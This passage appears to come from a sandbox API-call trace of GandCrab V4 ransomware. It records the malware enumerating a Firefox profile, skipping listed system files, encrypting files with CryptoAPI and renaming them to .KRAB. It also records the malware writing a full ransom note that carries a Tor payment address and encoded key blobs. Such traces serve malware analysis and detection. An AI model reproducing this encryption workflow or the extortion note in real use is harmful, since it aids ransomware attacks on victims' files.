returned 0x3870000 [0083.144] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.144] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x4000, lpOverlapped=0x0) returned 1 [0083.165] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffc000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.165] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x4000, lpOverlapped=0x0) returned 1 [0083.166] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0083.166] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.172] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.173] CloseHandle (hObject=0x7ec) returned 1 [0083.173] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.173] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\secmod.db"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\secmod.db.krab")) returned 1 [0083.174] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.174] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.174] lstrcmpW (lpString1="SecurityPreloadState.txt", lpString2=".") returned 1 [0083.174] lstrcmpW (lpString1="SecurityPreloadState.txt", lpString2="..") returned 1 [0083.174] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="SecurityPreloadState.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt" [0083.174] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.175] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt.KRAB") returned 109 [0083.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned 104 [0083.175] lstrlenW (lpString=".txt") returned 4 [0083.175] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.175] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.175] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned 104 [0083.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned 104 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="desktop.ini") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="autorun.inf") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ntuser.dat") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="iconcache.db") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="bootsect.bak") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="boot.ini") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ntuser.dat.log") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="thumbs.db") returned -1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ntldr") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="NTDETECT.COM") returned 1 [0083.176] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="Bootfont.bin") returned 1 [0083.176] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.177] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.177] lstrcmpW (lpString1="sessionCheckpoints.json", lpString2=".") returned 1 [0083.177] lstrcmpW (lpString1="sessionCheckpoints.json", lpString2="..") returned 1 [0083.177] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="sessionCheckpoints.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json" [0083.177] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.177] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json.KRAB") returned 108 [0083.177] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0083.177] lstrlenW (lpString=".json") returned 5 [0083.177] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.178] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".json ") returned 6 [0083.178] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0083.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="desktop.ini") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="autorun.inf") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ntuser.dat") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="iconcache.db") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="bootsect.bak") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="boot.ini") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ntuser.dat.log") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="thumbs.db") returned -1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="KRAB-DECRYPT.html") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ntldr") returned 1 [0083.178] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="NTDETECT.COM") returned 1 [0083.179] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="Bootfont.bin") returned 1 [0083.179] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.179] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10111b0) returned 1 [0083.180] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.181] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.181] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.181] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0083.181] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0083.181] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.181] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011678) returned 1 [0083.183] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.183] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.184] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.184] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0083.184] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0083.184] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.184] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011348) returned 1 [0083.185] CryptImportKey (in: hProv=0x1011348, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0083.186] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.186] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.186] GetLastError () returned 0x0 [0083.186] CryptDestroyKey (hKey=0x10235f8) returned 1 [0083.186] CryptReleaseContext (hProv=0x1011348, dwFlags=0x0) returned 1 [0083.186] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011700) returned 1 [0083.187] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0083.188] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.188] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.188] GetLastError () returned 0x0 [0083.188] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0083.188] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0083.188] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessioncheckpoints.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0083.189] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.189] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.190] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x120, lpOverlapped=0x0) returned 1 [0083.204] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffee0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.204] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x120, lpOverlapped=0x0) returned 1 [0083.204] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0083.206] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.210] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.210] CloseHandle (hObject=0x7ec) returned 1 [0083.210] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.211] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessioncheckpoints.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessioncheckpoints.json.krab")) returned 1 [0083.212] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.212] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.212] lstrcmpW (lpString1="sessionstore-backups", lpString2=".") returned 1 [0083.212] lstrcmpW (lpString1="sessionstore-backups", lpString2="..") returned 1 [0083.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="sessionstore-backups" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups" [0083.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\" [0083.212] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0083.212] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.213] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.213] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.213] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.213] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\\\KRAB-DECRYPT.txt") returned 118 [0083.213] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0083.223] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0083.224] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0083.224] CloseHandle (hObject=0x7ec) returned 1 [0083.224] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.225] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.225] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1e, wMilliseconds=0x1a1)) [0083.225] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.225] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.226] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.226] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a08d2ca4dee3d.lock") returned 124 [0083.226] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0083.227] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.227] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\") returned 101 [0083.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="*" | out: 